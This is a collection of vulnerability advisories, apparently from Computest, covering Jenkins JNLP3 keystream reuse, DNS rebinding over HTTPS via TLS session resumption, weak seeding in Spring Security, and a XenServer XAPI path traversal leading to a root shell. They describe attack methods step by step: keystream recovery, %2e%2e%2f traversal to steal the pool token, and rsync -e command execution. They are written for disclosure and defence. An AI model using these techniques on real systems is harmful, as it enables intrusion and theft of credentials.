Jenkins supports 4 different versions of the remoting protocol. 1 and 2 are unencrypted, 3 uses a custom handshake protocol and 4 is secured using TLS. The vulnerability exists only in version 3.

1, 2 and 3 are deprecated and warnings are shown when they are enabled. However, these warnings and the documentation only mention stability impact, no security impact, such as a lack of authentication.

As described in the documentation in the code, the JNLP3 handshake works as follows:

src/main/java/org/jenkinsci/remoting/engine/JnlpProtocol3Handler.java#L80-L110

Client                                                                Master
          handshake ciphers = createFrom(agent name, agent secret)
 
  |                                                                     |
  |      initiate(agent name, encrypt(challenge), encrypt(cookie))      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                         encrypt(challenge)                          |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          encrypt(cookie)                            |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                  encrypt(AES key) + encrypt(IvSpec)                 |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
 
             channel ciphers = createFrom(AES key, IvSpec)
          channel = channelBuilder.createWith(channel ciphers)

The encrypt function in this diagram uses keys that are derived from the client name and client secret. The exact procedure createFrom is not important for this issue, just that the keys only depend on the client name and secret and are therefore constant for all connections between that client and the master:

src/main/java/org/jenkinsci/remoting/engine/HandshakeCiphers.java#L108-L123

The encryption algorithm used is AES/CTR/PKCS5Padding:

src/main/java/org/jenkinsci/remoting/engine/HandshakeCiphers.java#L135

Vulnerability

As is commonly known, CTR mode must never be reused with the same keys and counter (IV): the encrypted value is generated by bytewise XORing a keystream with the plaintext data. When two different messages are encrypted using the same key and counter, the XOR of the two ciphertexts gives the XOR of the plaintexts as the keystream is canceled out. If one plaintext is known, this makes it possible to determine the keystream and the data in the second plaintext.

Each call to encrypt in the diagram above restarts the cipher, therefore, even when performing the handshake just once the keystream is reused multiple times.

Knowing the first ~2080 bytes of the AES-CTR keystream is enough to impersonate a client: the client needs to be able decrypt the server’s challenge, which is around 2080 bytes. All other packets are smaller than that.

Exploitation

There are a number of ways to trick the server into encrypting a known plaintext, which allows an attacker to recover a part of the keystream, which can then be used to decrypt other packets. We describe a relatively efficient approach below, but many different (possibly more efficient) approaches are likely to exist.

The client can send an initiate packet with the challenge as an empty string. This means that the response from the server will always be the encryption of the SHA-256 hash of the empty string. This allows the attacker to decrypt the initial bytes of the keystream.

Then, the attacker can obtain the rest of the keystream byte by byte in the following way: The attacker encrypts a message that is exactly as long as the keystream the attacker currently knows and appends one extra byte. The server will respond with one of 256 possible hashes, depending on how the extra byte was decrypted by the server. The attacker can decrypt the hash (because a large enough prefix is already known from the previous step) and determine which byte the server had used, which can be XORed with the ciphertext byte to obtain the next keystream byte.

There is one complication to this approach: in many places in the handshake binary data is for some unknown reason interpreted as ISO-8859-1 and converted to UTF8 or vice versa. This means that when the decrypted challenge ends in a character that is a partial UTF-8 multibyte sequence, the character is ignored. In that case, it is not possible to determine which character the server had decrypted. By trying at most 3 different bytes, it is possible to find one that is valid.

We have developed a proof-of-concept of this attack. Using this, we were able to retrieve enough bytes of the keystream to pass authentication with about 3000 connections to Jenkins, which took around 5 minutes against a local server. As mentioned, it is likely that this can be reduced even further.

It is also possible to perform a similar attack to impersonate a master against a client if the connection can be intercepted and the client automatically reconnects. We did not spend time performing this.

Recommendation

It is not possible to prevent this attack in a way that is backwards compatible with existing JNLP3 clients and masters. Therefore, we recommend removing support for JNLP3 completely. Arguably, JNLP1 and JNLP2 protocols are safer to use as those can only be taken over if a connection is intercepted. A safer encrypted alternative already exists (JNLP4), so investing time in fixing this protocol would not be needed.

Resolution

We reported the issue to the Jenkins team, who coincidentally were already considering removing support for the version 1, 2 and 3 remoting protocols as they are deprecated and were known to have stability impact. These protocols have now been removed in Jenkins 2.219. In version 2.204.2 of the LTS releases of Jenkins, this protocol can still be enabled by setting a configuration flag, but this is strongly discouraged.

Users using an older version of Jenkins can mitigate this issue by not enabling version 3 of the remoting protocol.

Timeline

2019-12-06 Issue reported to Jenkins as SECURITY-1682.
2019-12-06 Issue acknowledged by the Jenkins team.
2020-01-16 Fix prepared.
2020-01-29 Advisory published by Jenkins
2020-01-30 This advisory published by Computest.

DNS rebinding for HTTPS

25 November 2019 at 00:00

A DNS rebinding attack is possible against a server that uses HTTPS by abusing TLS session resumption in a specific way.

In addition, the implementation of the Extended Master Secret extension in SChannel contained a vulnerability that made it ineffective.

Technical background

A DNS rebinding attack works as follows: an attacker A waits for a user C to visit the attacker’s website, say attacker.example. The DNS record for attacker.example initially points to an IP address of the attacker with a low TTL. Once the page is loaded, JavaScript repeatedly attempts to communicate back to attacker.example using the XMLHttpRequest API. As this is in the same origin, the attacker can influence almost everything about the request and can read almost every part of the response.

The attacker then updates this DNS record to point to a different server (not owned by A) instead. This means that the requests intended for attacker.example end up at a different server after the record expires, say, server.example owned by S. If this server does not check the HTTP Host header of the request, then it may accept and process it.

The proper way to prevent this attack is to ensure that web servers verify that the Host header on every request matches a host that is in use by that server. Another workaround that is commonly recommended is to use HTTPS, as the attack as described does not work with HTTPS: when the DNS record is updated and C connects to server.example, C will notice that the server does not present a valid certificate for attacker.example, therefore the connection will be aborted.

The most interesting scenarios for this attack involve attacking a device on the network (or even on the local machine) of C. This is due to a number of reasons, one of which is the problems with HTTPS.

Attack

It is possible to perform a DNS rebinding attack to a HTTPS server by abusing TLS session resumption in a specific way. Contrary to the “normal” DNS rebinding attack, A needs to be able to communicate with S to establish a session that C will later resume. This attack is similar to the Triple-Handshake Attack 3SHAKE, however, the measures that were taken by TLS implementations in response to that attack do not adequately defend against this attack.

Just like in the 3SHAKE attack, A can set up two connections C -> A and A -> S that have the same encryption keys and then pass the session ID or session ticket from S on to C. This is known as an “Unknown Key-Share Attack”. Contrary to the 3SHAKE attack, however, A can update the DNS record for attacker.example before the session is resumed. TLS resumption does not re-transmit the certificate of the server, both endpoints will assume that the certificate is still the same as for the previous connection. Therefore, when C resumes the connection at S, C assumes it has an encrypted connection authenticated by attacker.example, while S assumes it has sent the certificate for server.example on this connection.

To any web applications running on S, the connection will appear to be originating from C’s IP address. If the website on server.example has functionality that is IP restricted to only be available to C, then A will be able to interact with this functionality on behalf of C.

In more detail:

  1. C opens a connection to A, using client random r1 in the ClientHello message.

  2. A opens a connection to S, using the same client random r1. A advertises only the ciphers C included that use RSA key exchange and A does not advertise the “extended master secret” TLS extension.

  3. S replies to A with server random r2 and session ID s in the ServerHello message.

  4. A replies to C with server random r2 and session ID s and the same cipher suite as chosen for the other connection, but A’s own certificate. A makes sure that the extended master secret extension is not enabled here either.

  5. C sends an encrypted pre-master secret to A. A decrypts this value using the private RSA key corresponding to A’s certificate to obtain its value, p.

  6. A also sends p in a ClientKeyExchange to S, now encrypted with the public key of S.

  7. Both connections finish. The master secret for both is derived only from r1, r2 and p. Therefore, they are identical. A knows this master secret, so it can cleanly finish both handshakes and exchange data on both connections.

  8. A sends a page containing JavaScript to C.

  9. A updates the DNS record for attacker.example to point to S’s IP address instead.

  10. A closes the connections with C and S.

  11. Due to an XHR request from A’s JavaScript, C will reconnect. It receives the new DNS record, therefore it resumes the connection at S, which will work as it recognises the session ID and the keys match. As it is a resumption, the certificate message is skipped.

  12. JavaScript from A can now send HTTP requests to S within the origin of attacker.example.

Cipher selection

A can force the use of a specific cipher suite on the first two connections, assuming both C and S support it. It can indicate support for only the desired cipher suite(s) on the connection A -> S and then select the same cipher suite on the C -> A connection.

When a session is resumed, the same cipher suite is used as the original connection did. Because A removed certain cipher suites, the ClientHello that is used for resumption will most certainly indicate stronger ciphers than the cipher the original connection had. A server could detect this and then decide to perform a full handshake instead, because this way a stronger cipher suite would be used. It appears that few servers actually do this.

Extended master secret

In response to the 3SHAKE attack, the extended master secret (EMS) extension was added to TLS in RFC 7627. This extension appears to be implemented by most browsers, however, support on servers is still limited. This extension would make the Unknown Key-Share attack impossible, as the full contents of the initial handshake messages (including the certificates) are included in the master secret computation, not just the random values.

The attack is impossible if both client and server support EMS and enforce its usage. However, as server support is limited (browser) clients currently do not require it.

When the extension is not required but supported by both the client and the server, it could be used to detect the above attack and refuse resumption (making the attack impossible as well). If the server receives a ClientHello that indicates support for EMS and which attempts to resume a session that did not use EMS, it must refuse to resume it and perform a full handshake instead.

This is described in RFC 7627 as follows:

 o  If the original session did not use the "extended_master_secret"
    extension but the new ClientHello contains the extension, then the
    server MUST NOT perform the abbreviated handshake.  Instead, it
    SHOULD continue with a full handshake (as described in
    Section 5.2) to negotiate a new session.

This is, however, not universally followed by servers. Most notably, we found that IIS indicates support for EMS in the full-handshake ServerHello, but when a ClientHello is received that indicates support for EMS that requests to resume a session that did not use EMS, IIS allows it to be resumed. We also found that servers hosted by the Fastly CDN were vulnerable in the same way.

The attack also works when the server does not support EMS, but the client does. The Interoperability Considerations in §5.4 of RFC 7627 only say the following about that:

 If a client or server chooses to continue an abbreviated handshake to
 resume a session that does not use the extended master secret, then
 the current connection becomes vulnerable to a man-in-the-middle
 handshake log synchronisation attack as described in Section 1.
 Hence, the client or server MUST NOT use the current handshake's
 "verify_data" for application-level authentication.  In particular,
 the client MUST disable renegotiation and any use of the "tls-unique"
 channel binding [RFC5929] on the current connection.

This section only highlights risks for renegotiation and channel binding on this connection. The ability to perform a DNS rebinding attack does not seem to have been considered here. To address that risk, the only option is to not resume connections for which EMS was not used and for which the remote IP address has changed.

Other configurations

The sequence of handshake messages is different when session tickets are used instead of ID-based resumption, but the attack still works in pretty much the same way.

While the example above used the RSA key exchange, as noted by the 3SHAKE attack the DHE or ECDHE key exchanges are also affected if the client accepts arbitrary DHE groups or ECDHE curves and does not verify that these are secure. Support for DHE is removed in all common browsers (except Firefox) and arbitrary ECDHE curves appears to never have been supported in browsers. When using Curve25519, certain “non-contributory” points can be used to force a specific shared secret. The TLS implementations we looked at correctly reject those points.

TLS 1.3 is not affected, as in that version the EMS extension is incorporated into the design.

SNI also influences the process. On the initial connection, the attacker can pick the name that is indicated for SNI. While a large portion of webservers is configured to reject unknown Host headers, almost no HTTPS servers were found that reject the handshake when an unknown SNI name is received, servers most often reply with a certain “default” certificate. We found that some servers require the SNI name for a resumption to be equal to the SNI name for the original connection. If this is not the case then it may be possible to change the selected virtual host based on the SNI name of the first connection, though we did not find a server configured like this in practice.

It may also be possible for A to send a client certificate to S on the first connection, and then attribute the messages sent after the resumption to A’s identity. We did not find a concrete attack that would be possible using this, but for other protocols that rely on TLS it may be an issue.

The attack as described relies on A updating their DNS record. Even with a minimal TTL, this may require a long time for all caches to obtain the updated record. This is not required for the attack: A can include two IP addresses in the in the A/AAAA record, the first being A’s own address, the second the address of the victim. Once A has delivered the JavaScript and session ID/ticket, A can reject connections from the user (by sending a TCP RST response), which means the browser will fall back to the second IP address, therefore connecting to S instead.

Exploitation

We wrote a tool to accept TLS connections and perform the attack by establishing a connection to a remote server with the same master secret and forwarding the session ID. By subsequently refusing connections, it was possible to cause browsers to resume its session at the remote server instead.

We have performed this attack successfully against the following browsers:

  • Safari 12.1.1 on macOS 10.14.5.
  • Chrome 74.0.3729.169 on macOS 10.14.5.
  • Safari on iOS 12.3.
  • Microsoft Edge 44.17763.1.0 on Windows 10.
  • Chrome 74.0.3729.169 on Windows 10.
  • Internet Explorer 11 on Windows 7.
  • Chrome 74.0.3729.61 on Android 10.

As mentioned, we also found the following server vulnerable to allowing a resumption of a non-EMS connection using an EMS ClientHello:

  • IIS 10.0.17763.1 on Windows 10.

Firefox is (currently) not vulnerable, as its TLS session storage separates sessions by remote IP address and will not attempt to resume if the IP address has changed. (https://bugzilla.mozilla.org/show_bug.cgi?id=415196)

Impact

To summarise, this vulnerability can be used by an attacker to bypass IP restrictions on a web application, provided that the web server:

  • supports TLS session resumption;
  • does not support the EMS TLS extension (or does not enforce it, like IIS);
  • can be connected to by an attacker;
  • does not verify the Host header on requests or the targeted web application is the fallback virtual host;
  • has functionality that is restricted based on IP address.

As it cannot be determined automatically whether a website has functionality that is IP restricted, we could not determine the exact scale of vulnerable websites. Based on a scan of the top 1M most popular websites, we estimate that about 30% of webservers fulfil the first 2 requirements.

Resolution

Chrome 77 will not allow TLS sessions to be resumed if the RSA key exchange is used and the remote IP address has changed.

SChannel (IE/Edge) in update KB4520003 will not allow TLS sessions to be resumed if EMS was not used and the implementation of EMS on the server was fixed to not allow non-EMS sessions to be resumed using an EMS-handshake.

Safari in macOS Catalina (10.15) will not allow TLS sessions to be resumed if the remote IP address has changed.

Fastly has fixed their TLS implementation to also not allow non-EMS sessions to be resumed using an EMS-handshake.

Due to these changes, servers may notice a decrease in the percentage of sessions that are successfully resumed. In order to maximise the chance of successful resumption, servers should make sure that:

  • Cipher suites using RSA key exchange are only used if ECDHE is not supported by the client.
  • The Extended Master Secret extension is supported and enabled by the server.
  • Clients connect to the same server IP address as much as possible, for example by ensuring the TTL of DNS responses is high if multiple IP addresses are used.

When using TLS 1.3, the RSA key exchange is no longer allowed and Extended Master Secret has become part of the design instead of an extension. Therefore, the first two recommendations are no longer needed.

Timeline

2019-06-03 Report sent to Google, Apple, Microsoft.
2019-07-01 Fix committed for Chromium.
2019-07-15 EMS problem reported to Fastly.
2019-07-30 Fix by Fastly deployed and confirmed.
2019-09-11 Chrome 77 released with the fix.
2019-10-07 macOS Catalina released with the fix.
2019-10-08 Update KB4520003 released by Microsoft with the fix.

Spring Security - insufficient cryptographic randomness

4 July 2019 at 00:00

The SecureRandomFactoryBean class in Spring Security by Pivotal has a vulnerability in certain versions that could lead to the generation of predictable random values when a custom seed is supplied. This contradicted the documentation that states that adding a custom seed does not decrease the entropy. The cause of this bug is the use of the Java SecureRandom API in an incorrect way. This vulnerability could lead to predictable keys or tokens in applications that depend on cryptographically-secure randomness. This vulnerability was fixed by Pivotal by ensuring that the proper seeding always takes place.

Applications that use this class may need to evaluate if any predictable tokens were generated that should be revoked.

Technical Background

The SecureRandom class in Java offers a cryptographically secure pseudo-random number generator. It is often the best method in Java for generating keys, tokens or nonces for which unpredictability is critical. When using this class multiple algorithms may be available. An explicit algorithm can be selected by calling (for example) SecureRandom.getInstance("SHA1PRNG"). The seeding of an instance generated this way happens as soon as the first bytes are requested, not during creation.

Normally, when calling setSeed() on a SecureRandom instance the seed is incorporated into the state, to supplement its randomness. However, when calling setSeed() on a instance newly created with an explicit algorithm there is no state yet, therefore the seed will set the entire state and no other entropy is used.

This is mentioned in the documentation for SecureRandom.getInstance():

https://docs.oracle.com/javase/7/docs/api/java/security/SecureRandom.html

The returned SecureRandom object has not been seeded. To seed the returned
object, call the setSeed method. If setSeed is not called, the first call to
nextBytes will force the SecureRandom object to seed itself. This self-
seeding will not occur if setSeed was previously called.

This text is misleading, as the first two sentences may give the impression that the instance could be unsafe to use without seeding, while the self-seeding will in fact be much safer than supplying the seed for almost all applications.

This is a well known flaw in the design that can lead to incorrect use that has been discussed before:

https://stackoverflow.com/a/27301156

You should never call setSeed before retrieving data from the "SHA1PRNG" in
the SUN provider as that will make your RNG (Random Number Generator) into a
Deterministic RNG - it will only use the given seed instead of adding the
seed to the state. In other words, it will always generate the same stream
of pseudo random bits or values.

Google noticed that on Android some apps depend on this unexpected usage, which made it difficult to change the behaviour.

https://android-developers.googleblog.com/2016/06/security-crypto-provider-deprecated-in.html

A common but incorrect usage of this provider was to derive keys for
encryption by using a password as a seed. The implementation of SHA1PRNG had
a bug that made it deterministic if setSeed() was called before obtaining
output.

Vulnerability

The SecureRandomFactoryBean class in spring-security returns a SecureRandom object with SHA1PRNG as explicit provider. It is optionally possible to set a Resource as a seed:

security/core/token/SecureRandomFactoryBean.java#L37-L52

public SecureRandom getObject() throws Exception {
    SecureRandom rnd = SecureRandom.getInstance(algorithm);

    if (seed != null) {
        // Seed specified, so use it
        byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
        rnd.setSeed(seedBytes);
    }
    else {
        // Request the next bytes, thus eagerly incurring the expense of default
        // seeding
        rnd.nextBytes(new byte[1]);
    }

    return rnd;
}

The documentation of SecureRandomFactoryBean.setSeed() states (contradictory to the documentation of SecureRandom itself):

Allows the user to specify a resource which will act as a seed for the
SecureRandom instance. Specifically, the resource will be read into an
InputStream and those bytes presented to the SecureRandom.setSeed(byte[])
method. Note that this will simply supplement, rather than replace, the
existing seed. As such, it is always safe to set a seed using this method
(it never reduces randomness).

When used with a seed this means that a SecureRandom instance is generated in the vulnerable way as described above. In other words, the Resource entirely determines all output of this PRNG. If two different objects are created with the same seed then they will return identical output. The note in the documentation stating that it supplements the seed and can not reduce randomness was therefore false.

Recommendation

The easiest way to prevent this vulnerability would be to request the first byte even if a seed is set, before calling setSeed():

SecureRandom rnd = SecureRandom.getInstance(algorithm);

// Request the first byte, thus eagerly incurring the expense of default
// seeding and to prevent the seed from replacing the entire state.
rnd.nextBytes(new byte[1]);

if (seed != null) {
    // Seed specified, so use it
    byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
    rnd.setSeed(seedBytes);
}

This, however, requires that no application depends on the current possibility of using SecureRandom fully deterministically.

Mitigation

Applications that use SecureRandomFactoryBean with a vulnerable version of Spring Security can mitigate this issue by not providing a seed with setSeed() or ensuring that the seed itself has sufficient entropy.

Conclusion

Pivotal responded quickly and fixed the issue in the recommended way in Spring Security. However, depending on the applications that use this library, keys or tokens which were generated using insufficient randomness may still exist and be in use. Applications that use SecureRandomFactoryBean should investigate if this may be the case and if any keys or tokens need to be revoked.

Applications that rely on using SecureRandomFactoryBean to generate deterministic sequences will no longer work and should switch to a proper key-derivation function.

Timeline

2019-03-08 Report sent to [email protected].
2019-03-09 Reply from Pivotal that they confirmed the issue and are working on a fix.
2019-03-18 Fixed by Pivotal in revision 9c1eac79e2abb50f7b01e77c2418566f2a30532f.
2019-04-02 Vulnerability report published by Pivotal.
2019-04-03 Spring Security 5.1.5, 5.0.12, 4.2.12 released with the fix.
2019-07-04 Advisory published by Computest.

XenServer - path traversal leading to authentication bypass

14 August 2018 at 00:00

During a brief code review of XenServer, Computest found and exploited a vulnerability in the XAPI management service that allows an attacker to bypass authentication and remotely perform arbitrary XAPI calls with administrative privileges.

This vulnerability can be further exploited to execute arbitrary shell commands as the operating system “root” user on the Dom0 virtual machine. The Dom0 is the component that manages the hypervisor, and has full control over all the virtual machines as well as the network and storage resources attached to the system.

To exploit this vulnerability an attacker has to be on a network that can reach one of the IPs and ports the XAPI service is available on (port numbers are 80 and 443 by default). Alternatively they can perform the attack through the browser of a user who has access to this port, via either a DNS rebinding attack or possibly by using the primary vulnerability to mount a cross-site scripting attack by using it to read a logfile containing attacker-controlled HTML.

This was not a full audit and further issues may or may not be present.

About XenServer and XAPI

About XenServer:

XenServer is the leading open source virtualization platform, powered by the Xen Project hypervisor and the XAPI toolstack. It is used in the world’s largest clouds and enterprises.

Technical support for XenServer is available from Citrix.

Source

About XAPI:

The Xen Project Management API (XAPI) is:

  • A Xen Project Toolstack that exposes the XAPI interface. When we refer to XAPI as a toolstack, we typically include all dependencies and components that are needed for XAPI to operate (e.g. xenopsd).
  • An interface for remotely configuring and controlling virtualised guests running on a Xen-enabled host. XAPI is the core component of XenServer and XCP.

Source

While XAPI is maintained by the Xen project, it is not a required component of all Xen-based systems. It is required in XenServer.

Technical Background

Virtual machines have become the platform of choice for nearly all new IT infrastructure because of the massive benefits in manageability and resource optimization. However, a virtual machine can only be as secure as the platform it runs on.

For this reason compromising a hypervisor is always a high priority target, both during penetration tests and for real attackers.

The XAPI toolstack provides an API interface that is used both for communication between nodes in the same pool and for managing the pool, for example using a desktop application such as XenCenter. It is also the backend used by command line tools such as ‘xe’ and can be used by management platforms such as OpenStack, CloudStack, and Xen Orchestra.

Availability of the XAPI port, and vulnerability to DNS rebinding

While Citrix recommends keeping management traffic separate from storage traffic and VM traffic, in practice the system is often not configured this way. By default, the XAPI service appears to listen on any IP assigned to the hypervisor (actually the Dom0, to be precise). If no external interface is selected as a management interface, the XAPI service may still be accessible through one or more host internal management networks which can be made available to VMs.

The XAPI service is available both over unencrypted HTTP on port 80 and over HTTPS on port 443 (with a self-signed certificate by default).

The service does not check the HTTP Host header specified in requests, which makes the service vulnerable to DNS rebinding attacks. Using a DNS rebinding attack a remote attacker can reach a XAPI service on the internal network by convincing a user on the internal network to visit a malicious website, without needing to exploit any vulnerability in the web browser or client OS.

Either way, because of the importance of a hypervisor it still needs to be able to defend against attackers who have already gained access to internal networks.

Authentication and request handling in XAPI

In assessing the XAPI we started by identifying the parts of the code where authentication checks are performed. All code is available on GitHub.

The first thing to note is that API endpoints are registered using add_handler in the file /ocaml/xapi/xapi_http.ml.

let add_handler (name, handler) =

let action =
  try List.assoc name Datamodel.http_actions
  with Not_found ->
    (* This should only affect developers: *)
    error "HTTP handler %s not registered in ocaml/idl/datamodel.ml" name;
    failwith (Printf.sprintf "Unregistered HTTP handler: %s" name) in
let check_rbac = Rbac.is_rbac_enabled_for_http_action name in

let h = match handler with
  | Http_svr.BufIO callback ->
    Http_svr.BufIO (fun req ic context ->
        (try
           if check_rbac
           then (* rbac checks *)
             (try
                assert_credentials_ok name req ~fn:(fun () -> callback req ic context) (Buf_io.fd_of ic)
              with e ->
                debug "Leaving RBAC-handler in xapi_http after: %s" (ExnHelper.string_of_exn e);
                raise e
             )
           else (* no rbac checks *)
             callback req ic context

So in short: if Rbac.is_rbac_enabled_for_http_action returns true, authentication is not needed. Otherwise assert_credentials is called, which will throw an exception if the request is not authorized.

Looking into is_rbac_enabled_for_http_action a bit more, the following endpoints are exempted from authentication:

(* these public http actions will NOT be checked by RBAC *)
(* they are meant to be used in exceptional cases where RBAC is already *)
(* checked inside them, such as in the XMLRPC (API) calls *)
let public_http_actions_with_no_rbac_check =
  [
    "post_root"; (* XMLRPC (API) calls -> checks RBAC internally *)
    "post_cli";  (* CLI commands -> calls XMLRPC *)
    "post_json"; (* JSON -> calls XMLRPC *)
    "get_root";  (* Make sure that downloads, personal web pages etc do not go through RBAC asking for a password or session_id *)
    (* also, without this line, quicktest_http.ml fails on non_resource_cmd and bad_resource_cmd with a 401 instead of 404 *)
    "get_blob"; (* Public blobs don't need authentication *)
    "post_root_options"; (* Preflight-requests are not RBAC checked *)
    "post_json_options";
    "post_jsonrpc";
    "post_jsonrpc_options";
    "get_pool_update_download";
]

Authentication is performed in the function assert_credentials_ok, in the file /ocaml/xapi/xapi_http.ml. Some things to note about this function:

  • Besides username and password or an existing session_id, access can be granted by passing the pool_token parameter. This is a static token shared by all nodes in the pool, and is stored at /etc/xensource/ptoken. This token grants full administrative privileges.

  • Adminstrative access is granted for connections over a local UNIX socket.

This means that any vulnerability that can perform an arbitrary file read or access an internal socket will enable full administrative access.

Finding the primary vulnerability

Since there are not too many endpoints that bypass authentication, it makes sense to quickly skim over each one to see if there is anything interesting.

The mapping from HTTP verb (GET, POST, …) and URL to action name is located in the files under /ocaml/idl/datamodel*.m, and the mapping from action name to handler function happens in various calls to the add_handler function we already saw. We use this to find that, for example, the action get_pool_update_download is associated with a GET request to the /update/ URL, and is dispatched to the pool_update_download_handler function:

let pool_update_download_handler (req: Request.t) s _ =
  debug "pool_update.pool_update_download_handler URL %s" req.Request.uri;
  (* remove any dodgy use of "." or ".." NB we don't prevent the use of symlinks *)
  let filepath = String.sub_to_end req.Request.uri (String.length Constants.get_pool_update_download_uri)
                 |> Filename.concat Xapi_globs.host_update_dir
                 |> Stdext.Unixext.resolve_dot_and_dotdot 
                 |> Uri.pct_decode  in
  debug "pool_update.pool_update_download_handler %s" filepath;

  if not(String.startswith Xapi_globs.host_update_dir filepath) || not (Sys.file_exists filepath) then begin
    debug "Rejecting request for file: %s (outside of or not existed in directory %s)" filepath Xapi_globs.host_update_dir;
    Http_svr.response_forbidden ~req s
  end else begin
    Http_svr.response_file s filepath;
    req.Request.close <- true
end

This immediately looks extremely suspicious, in particular these two lines:

|> Stdext.Unixext.resolve_dot_and_dotdot
|> Uri.pct_decode  in

Here, the code is first resolving any ../ sequences, and after that it will perform decoding of urlencoding sequences such as %25. (In OCaml, the |> operator behaves somewhat like the | (pipe) operator in unix shell scripts.)

This means that if the decoding produces new ../ sequences, they will not be resolved and the naive check below it to verify that the produced path is under the update root directory is no longer sufficient.

In short, this leads to a classic path traversal vulnerability where %2e%2e%2f sequences can be used to escape the parent directory and read arbitrary files, including the file containing the pool token.

As described earlier, possession of the pool token enables full administrative access to the hypervisor.

Some notes about a potential alternative to the DNS rebinding attack

One other thing to note is that the response does not set a HTTP Content-Type header, which might make it possible for attackers to exploit a XAPI service on an internal network from the internet if they can trick someone on the internal network into visiting a malicious site (a scenario similar to the previously described DNS rebinding attack).

In this attack the malicious site would first perform a request that contains HTML and JavaScript in the URL, causing these to be written to a log file. In a second request, that logfile would then be loaded as a HTML page. The JavaScript on that page would then be able to read and exfiltrate the pool token and/or perform further requests using the pool token, something JavaScript on a random website on the internet would not normally be able to do because of the single origin policy enforced by web browsers.

This attack is overall much less practical than the DNS rebinding attack, and we have not investigated it further. The only advantage this attack has is that it could still work even if the XAPI was only available over HTTPS (DNS rebinding is in general not possible over HTTPS because the hostname will be validated by the TLS connection setup even if the HTTP server itself does not).

Obtaining a root shell on Dom0

While the pool token is sufficient to perform most actions on the hypervisor, an attacker is still restricted by the operations that the XAPI supports.

To determine the full impact we investigated whether it was possible to obtain full remote shell access as the operating system “root” user with this pool token. If so, it makes the impact story a good deal simpler: remote shell access as root means complete control, period.

As it turns out, it is possible to abuse the /remotecmd endpoint for this. The code for this endpoint is located in /ocaml/xapi/xapi_remotecmd.ml:

let allowed_cmds = ["rsync","/usr/bin/rsync"]

(* Handle URIs of the form: vmuuid:port *)
let handler (req: Http.Request.t) s _ =
  let q = req.Http.Request.query in
  debug "remotecmd handler running";
  Xapi_http.with_context "Remote command" req s
    (fun __context ->
       let session_id = Context.get_session_id __context in
       if not (Db.Session.get_pool ~__context ~self:session_id) then
         begin
           failwith "Not a pool session"
         end;
       let cmd=List.assoc "cmd" q in
       let cmd=List.assoc cmd allowed_cmds in
       let args = List.map snd (List.filter (fun (x,y) -> x="arg") q) in
       do_cmd s cmd args
    )

This appears to restrict the command to be executed to only rsync, but since rsync supports the -e option that lets you execute arbitrary shell commands anyway this restriction is not actually effective. Its unclear whether this constitutes a separate vulnerability, since there are plenty of other ways to abuse rsync to gain remote shell access (overwriting various config files or shellscripts, for example.)

This endpoint and the associated ability to execute shell commands is only available to ‘pool sessions’ (i.e. administrative sessions started by other nodes in the same pool), but because we have stolen the pool token we can produce such a session just by passing the stolen token in the right parameter.

Even though a complete exploit is deliberately not provided here, the core vulnerability is simple enough that an attacker will be able to exploit it with a minimum of effort.

Mitigating factors

Computest recommends verifying that none of the IPs assigned to the Dom0 are reachable from less-trusted networks (including the virtual networks assigned to the hosted virtual machines). While this is a best practice, it should not be considered a complete fix for this issue (especially considering the DNS rebinding concerns, which might provide an alternative route of attack).

Xen has noted that some versions of XenServer do not immediately create the /var/update directory on installation. Since the vulnerability can only be exploited when this directory exists, those versions will not be vulnerable directly after installation but will become vulnerable when installing their first update.

It is possible to prevent exploitation of this issue by moving the /var/update directory elsewhere and creating a file named /var/update to prevent the automatic creation of this directory. This will prevent the update functionality from working and may have further negative impact. It is not recommended by us, by Citrix, or by the Xen project, and we take no responsibility for problems caused by doing this.

Resolution

Xen has released a patch for the primary XAPI vulnerability under XSA-271 and has incorporated the fix in future XAPI versions.

Citrix will shortly publish or has published updates for supported XenServer releases 7.1 LTSR, 7.4 CR and 7.5 CR. Notably, no update will be published for version 7.3, which is out of support since June.

If you use either of these products you are advised to upgrade immediately.

Various cloud providers and other members of the Xen security pre-release list have received information about this vulnerability before the public release according to Xen’s usual policy (see also the timeline at the bottom of this document). If they were using XAPI they were able to apply the fix early.

If there is a risk that credentials stored on the dom0 or any of the VMs hosted by the hypervisor may have been compromised they should be changed.

There was previously no documented way of rotating the pool token, so Xen has provided the following steps to change it if deemed necessary.

  1. On all pool members, stop Xapi:

    service xapi stop
    
  2. On the pool master:

    rm /etc/xensource/ptoken
    /opt/xensource/libexec/genptoken -f -o /etc/xensource/ptoken
    
  3. Copy /etc/xensource/ptoken to all pool slaves

  4. On the pool master, restart the toolstack:

    xe-toolstack-restart
    
  5. On all pool slaves, restart the toolstack:

    xe-toolstack-restart
    

Note that rotating credentials (including the pool token) is not sufficient to lock out an attacker who has already established an alternative means of control. The above steps are only intended as a possible extra layer of assurance when there is already reasonable confidence that no attack happened, or possibly as part of making a “known good” backup from before an attack safe for use.

Conclusion

Xen and Citrix have responded quickly to patch the issue. However, older versions of XenServer remain without a patch, and upgrading XenServer may not be easy for some users because some features are no longer supported in the free version distributed by Citrix.

In response to the miscellaneous concerns raised in this document Xen has documented a new procedure to change the pool token if desired, but we have had no clear indication of whether other things such as the DNS rebinding aspect will be addressed in the future.

The unexpected discovery of this vulnerability during a basic software quality review shows once again that it’s more than worth it to spend some extra time during network design to lock down and segregate management services. Especially since the consequences of bugs in such basic infrastructure can be disastrous and patching is often complicated.

In our opinion the XAPI service does not take a very principled approach in its HTTP and authentication layers, which provided room for this bug and some of the other things we mentioned when investigating the impact of this vulnerability.

Timeline

2018-07-04 Disclosure of our draft to Xen and Citrix security teams
2018-07-05 First response from the Xen security team, XSA-271 assigned
2018-07-05 First response from the Citrix security team
2018-07-17 Xen proposes embargo date of 2017-08-14
2018-07-20 Agreed to set embargo date at 2018-08-14
2018-07-30 Received draft of Xen’s advisory
2018-07-31 Xen sends its advisory to its pre-release partners
